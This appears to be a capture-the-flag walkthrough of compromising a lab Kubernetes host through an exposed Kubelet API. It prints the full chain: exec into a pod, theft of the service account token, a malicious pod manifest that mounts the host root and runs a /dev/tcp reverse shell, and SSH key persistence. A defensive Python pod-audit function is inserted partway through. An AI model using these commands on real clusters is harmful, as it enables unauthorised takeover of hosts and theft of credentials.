nmap -p- --min-rate 10000 10.10.11.133 -Pn


After detecting the open ports, let's run a more detailed nmap scan against them.

nmap -A -sC -sV -p22,2379,2380,8443,10249,10250,10256 10.10.11.133 -Pn


That's Kubernetes (K8s); we need to pentest ports 8443 and 10250 more specifically.

For this, I will use this blog.

Let's start from port 8443.

I try anonymous enumeration first, but it doesn't work.

kubectl --server https://10.10.11.133:8443 get pod
kubectl --server https://10.10.11.133:8443 get namespaces
kubectl --server https://10.10.11.133:8443 cluster-info


Let's switch to port 10250, which is the Kubelet API. For this I use the kubeletctl tool.

kubeletctl pods -s 10.10.11.133


Let's list the running pods.

kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'


Let's try to execute some system commands in the nginx pod via kubeletctl.

kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx


I tried to get a reverse shell, but it doesn't work.

That's why I just execute /bin/bash to get a shell.

kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx

user.txt


From here, I need to check whether I can read the service account files in the pod.

kubeletctl -s 10.10.11.133 exec "ls /run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx


There are three of them: ca.crt, namespace and token.

ca.crt: the CA certificate used to verify Kubernetes API communications
namespace: indicates the current namespace
token: contains the service account token of the current pod

Let's grab the token and ca.crt files as below.

kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee ca.crt
kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee token


Let's store this token in an environment variable on our machine via export; we will use it together with the CA certificate to authenticate to the Kubernetes API.

export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)


Now it's time to check whether our authentication to Kubernetes is valid via kubectl.

kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod


Let's create a malicious pod via the .yaml file below.

apiVersion: v1
kind: Pod
metadata:
  name: dr4ks-malpod
  namespace: default
spec:
  containers:
  - name: dr4ks-malpod
    image: nginx:1.14.2
    command: ["/bin/bash"]
    args: ["-c", "/bin/bash -i >& /dev/tcp/10.10.14.18/1337 0>&1"]
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

When I create the pod from the .yaml config above, I will get a reverse shell on port 1337. To create the pod, I use kubectl apply.
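What makes this manifest dangerous is the combination of a hostPath volume on /, hostNetwork and an auto-mounted service account token. The following audit function, added here as an example and not part of the original writeup, walks a pod object in the shape kubectl returns (for instance from `kubectl get pod -o json`) and reports exactly those settings; the manifest above is embedded as a constructed dict for the demonstration, and the name `audit_pod` is my own.

```python
"""Flag the pod-spec settings that make the manifest above risky.

Works on a pod object as returned by `kubectl get pod -o json`
(the same structure the YAML manifest parses to).
"""
from typing import Dict, List

# Constructed copy of the page's manifest as a dict (what the YAML parses to).
MALPOD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "dr4ks-malpod", "namespace": "default"},
    "spec": {
        "containers": [{
            "name": "dr4ks-malpod",
            "image": "nginx:1.14.2",
            "volumeMounts": [{"mountPath": "/mnt", "name": "hostfs"}],
        }],
        "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}


def audit_pod(pod: Dict) -> List[str]:
    """Return one finding per risky setting; an empty list means nothing was flagged."""
    spec = pod.get("spec", {})
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    findings = []
    if spec.get("hostNetwork"):
        findings.append(f"{name}: hostNetwork=true shares the node's network namespace")
    # Kubernetes auto-mounts the token unless the pod (or its service account) opts out.
    if spec.get("automountServiceAccountToken", True):
        findings.append(f"{name}: service account token is auto-mounted into the pod")
    # Map hostPath volumes back to the container mounts that actually expose them.
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []):
        for m in c.get("volumeMounts", []):
            if m["name"] in host_paths:
                findings.append(f"{name}/{c['name']}: mounts host path "
                                f"{host_paths[m['name']]!r} at {m['mountPath']}")
    return findings


if __name__ == "__main__":
    for line in audit_pod(MALPOD):
        print(line)
```

A pod that sets automountServiceAccountToken to false and uses no hostPath volume or hostNetwork produces no findings, which is the baseline an admission policy should enforce for workloads like the nginx pod in this box.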

kubectl apply -f dr4ks_malpod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token


Hola, I got a reverse shell on port 1337.


root.txt


To get a persistent shell, I add my public key to /mnt/root/.ssh/authorized_keys (the host's root filesystem is mounted at /mnt) as below.

echo "{public_key}" > /mnt/root/.ssh/authorized_keys


Then I can SSH into the host using the private key id_rsa.

ssh -i /root/.ssh/id_rsa root@10.10.11.133
